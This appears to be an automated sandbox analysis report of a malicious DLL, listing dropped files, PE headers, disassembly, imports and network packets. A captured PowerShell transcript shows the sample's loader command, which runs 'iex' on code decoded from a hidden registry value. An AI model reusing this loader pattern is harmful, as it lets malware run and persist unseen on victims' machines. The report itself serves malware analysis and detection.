C:\Users\user\AppData\Local\Temp\~DFFEA6D319A9C13887.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.5708255083081805
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+sKQx6k5EoOxh1n5EoOxh1L5EoOxh1Q:kBqoxKAuqR+sKQx6k5W5m5/
MD5:	2BAD047CE34D88B262C7D76DD0ECD2D6
SHA1:	9D2ECB60E3401AA06601109DF3186D150FBEBA04
SHA-256:	98C8407810A4909A87221461F959D526065DAC0C18852ED0D16450914A88DC02
SHA-512:	757B1AA54166D18004E8F8C0CA832617049AF86565877117C2A2FF01F992BF91CE7268DDACE65FB1390D95D76D9D2F7A3469D7B180FA9891DF166903A3965E0D
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y7KFKGHLPCPBB5WJUUFT.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	3440
Entropy (8bit):	3.182621051795965
Encrypted:	false
SSDEEP:	48:qrdirPQIrC9GrIogAsASFuWFZdirPQIrh683GrIogAczH:qCPQV9SAAJvWWPQ23SAAG
MD5:	1BE188EF1D06EFD31E907969A86E522F
SHA1:	C799C80F3EA6F0AAA6E364532CCC9EAF86D61FB9
SHA-256:	0067D1E852AD4FB059D5F9CA93D2885D37AD59384DEC7B60A564A663D08C727E
SHA-512:	60E3C90228A37DDB60381C15A9B5D5AE1C6415039D98057EC71DCFFDDEC18D89E59CBF1C507A1EF3BF1160FEADF8824B7758755CAAF7ABC3508EBCE793B31A72
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>....8b4......?.c................................P.O. .:i.....+00.../C:\.....................1.....>Qwx..PROGRA~1..t......L.>Qwx....E...............J......./.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.3R`...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.J3Ra......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]...........Bk.A.....C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

C:\Users\user\Documents\20210119\PowerShell_transcript.216041.qn6F1W2y.20210119121318.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1189
Entropy (8bit):	5.307860808579923
Encrypted:	false
SSDEEP:	24:BxSA2xvBnOx2DOXUWOLCHGI4MWTHjeTKKjX4CIym1ZJXYOLCHGI4ZnxSAZb:BZivhOoORF4XTqDYB1ZeF49ZZb
MD5:	41297A9F811939FE8C156635C315AD1C
SHA1:	BAA462AB0DDCA01A39840452EB819AA6D6A2232E
SHA-256:	862107F1227FC2DF74EBBECC79FDDE9FDF5FFEC860A8E2EB335A036EE4B5395D
SHA-512:	B4EA18B854E49A0CEEEF636960B1DC046E006BDD40123ADDB155DCCD3DB6A031045888409606154060C17176BAF1FD9CF2545357B72AB46A3F82EAD242496EFB
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210119121318..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..Process ID: 7068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210119121318..******************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).Barclers))..********************..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.806865974324175
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mal.dll
File size:	411136
MD5:	640cf281c09e54fab9c5d0153dffc042
SHA1:	9ae08274286b72b5dab240645af0f513dab2852d
SHA256:	a2fa5a4d18033e67a7c0477e69acd03a61808c31e24dd9c120106fec161012ef
SHA512:	6672634ac012b3fdb8aa55ceeaa2c4f1cd8679551d3313bbb91bb134bcf83b29ee5718c431fb8cfbfd2525ac5e1c17310ede340c3f150f41ce1dc2bbf07a6c82
SSDEEP:	6144:ZqyytimMmhYrCYW1TmgGYlG42GunEyiKD3t18VVGAO8xhtbOnhMV:ZqyCh9hSC/1TVG42G3y/bkGmxhtCCV
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x....B...B...BVA.B...BVA.B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...BRich...B........PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1000bbb9
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x56955465 [Tue Jan 12 19:30:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	90052d8992fd75f28664bcf453a95718

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F405859A777h
call 00007F405859AED6h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F405859A633h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F405859A78Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F405859A77Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F405859A77Eh
add edx, 28h
cmp edx, esi
jne 00007F405859A75Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F405859A76Bh
call 00007F405859B2C5h
test eax, eax
jne 00007F405859A775h
xor al, al
ret
mov eax, dword ptr fs:[00000018h]
push esi
mov esi, 100622A8h
mov edx, dword ptr [eax+04h]
jmp 00007F405859A776h
cmp edx, eax
je 00007F405859A782h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F405859A762h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
call 00007F405859B290h
test eax, eax
je 00007F405859A779h
call 00007F405859B0EDh
jmp 00007F405859A78Ah
call 00007F40585988F5h
push eax
call 00007F40585A706Ch
pop ecx
test eax, eax
je 00007F405859A775h
xor al, al
ret
call 00007F40585A7252h
mov al, 01h
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x601e0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x60258	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x72000	0x520	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x73000	0x2898	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x5e110	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5e168	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4a000	0x1c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x48e52	0x49000	False	0.672948549872	data	6.91369590401	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x4a000	0x16cfe	0x16e00	False	0.518346567623	data	5.8401392147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x61000	0xff80	0x1000	False	0.237060546875	DOS executable (block device driver ght (c)	3.56865616163	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x71000	0x344	0x400	False	0.3857421875	data	2.78288789713	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x72000	0x520	0x600	False	0.404296875	data	3.73412547743	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x73000	0x2898	0x2a00	False	0.724609375	data	6.53775547573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x720a0	0x300	data	English	United States
RT_MANIFEST	0x723a0	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	DeleteFileA, ResetEvent, GetLocalTime, FindFirstChangeNotificationA, GetCurrentThread, WriteConsoleW, CreateFileW, HeapSize, ReadConsoleW, CreateFileA, OpenMutexA, Sleep, DuplicateHandle, ReleaseMutex, CreateMutexA, GetEnvironmentVariableA, PeekNamedPipe, VirtualProtect, GetShortPathNameA, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, HeapAlloc, HeapReAlloc, HeapFree, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetStdHandle, GetFileType, CloseHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, GetProcessHeap, FindClose
ole32.dll	OleSetContainedObject, OleUninitialize, OleInitialize
CRYPT32.dll	CertFreeCertificateChain, CryptEncodeObject, CertCloseStore, CertAddCertificateContextToStore, CertFreeCertificateContext, CertGetCertificateChain, CryptDecodeObject, CryptHashPublicKeyInfo, CertCreateCertificateContext, CertVerifyCertificateChainPolicy
RPCRT4.dll	UuidCreate, RpcMgmtSetServerStackSize, UuidFromStringA, NdrServerCall2, RpcServerListen, RpcRevertToSelf, RpcImpersonateClient, RpcServerRegisterIf, I_RpcBindingIsClientLocal, RpcRaiseException

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10029b30
Lawusual	2	0x10029610
Shallsister	3	0x10029670

Version Infos

Description	Data
LegalCopyright	2011 Scoreland Corporation. All rights reserved
InternalName	Liquid.dll
FileVersion	4.8.3.491
CompanyName	Scoreland
ProductName	Scoreland Busy nose
ProductVersion	4.8.3.491
FileDescription	Busy nose
OriginalFilename	Liquid.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 19, 2021 12:11:07.150798082 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.150918007 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.152534962 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.157259941 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.157329082 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.157444000 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.157457113 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.157458067 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.157695055 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200393915 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200429916 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200541019 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200587034 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200661898 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200691938 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200741053 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200756073 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200790882 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200822115 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.200927019 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.200978041 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.201653004 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.201793909 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.201931000 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.203203917 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.203476906 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.203913927 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.203993082 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.204049110 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.204591990 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.206224918 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.207047939 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.207622051 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.208981991 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.209058046 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.213380098 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.244587898 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.244635105 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.244664907 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245656967 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245697021 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245728970 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245743036 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.245779037 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.245785952 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.245874882 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245913982 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245946884 CET	443	49739	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.245994091 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.246038914 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.246046066 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.249042034 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.249808073 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.250158072 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.250199080 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.250232935 CET	443	49735	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.250288010 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.250317097 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.250323057 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.250325918 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251746893 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251784086 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251818895 CET	443	49740	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251857042 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251889944 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.251893997 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251916885 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.251926899 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.251926899 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.251934052 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.251948118 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.251971960 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.253638983 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.253680944 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.253712893 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.253729105 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.253756046 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.253763914 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.253772020 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254112959 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254302025 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254404068 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254491091 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254580021 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254683971 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.254779100 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.256372929 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256417990 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256454945 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256484985 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.256494045 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256501913 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.256536007 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256558895 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.256563902 CET	443	49733	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.256587982 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.256608009 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.258272886 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258372068 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258414030 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258431911 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.258451939 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258464098 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.258488894 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258507013 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.258546114 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.258574009 CET	443	49732	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.258634090 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.259673119 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.262723923 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.263087988 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.263219118 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.270024061 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270066977 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270106077 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270133972 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.270144939 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270148039 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.270181894 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270205021 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.270214081 CET	443	49734	87.248.118.23	192.168.2.3
Jan 19, 2021 12:11:07.270229101 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.270257950 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.282865047 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.286382914 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.286803007 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.288642883 CET	49739	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.288778067 CET	49735	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.288960934 CET	49740	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.289966106 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.291142941 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.291393995 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.291559935 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.297283888 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.297318935 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.298477888 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.298506975 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.298645973 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.299531937 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299576044 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299612045 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299649000 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299686909 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299715996 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.299722910 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299748898 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.299763918 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299777985 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.299801111 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.299814939 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.299850941 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.301178932 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.301222086 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.301246881 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.301259041 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.301276922 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.301297903 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.301321030 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.301398039 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.301614046 CET	49732	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.301701069 CET	49733	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.301734924 CET	49734	443	192.168.2.3	87.248.118.23
Jan 19, 2021 12:11:07.302226067 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.302264929 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.302292109 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.302323103 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.303309917 CET	443	49737	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.303349018 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.303385019 CET	49737	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.303386927 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.303411961 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.303442955 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.303627014 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.304447889 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.304497004 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.304532051 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.304563999 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.305491924 CET	443	49738	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.305532932 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.305562973 CET	49738	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.305572033 CET	443	49736	151.101.1.44	192.168.2.3
Jan 19, 2021 12:11:07.305599928 CET	49736	443	192.168.2.3	151.101.1.44
Jan 19, 2021 12:11:07.305630922 CET	49736	443	192.168.2.3	151.101.1.44
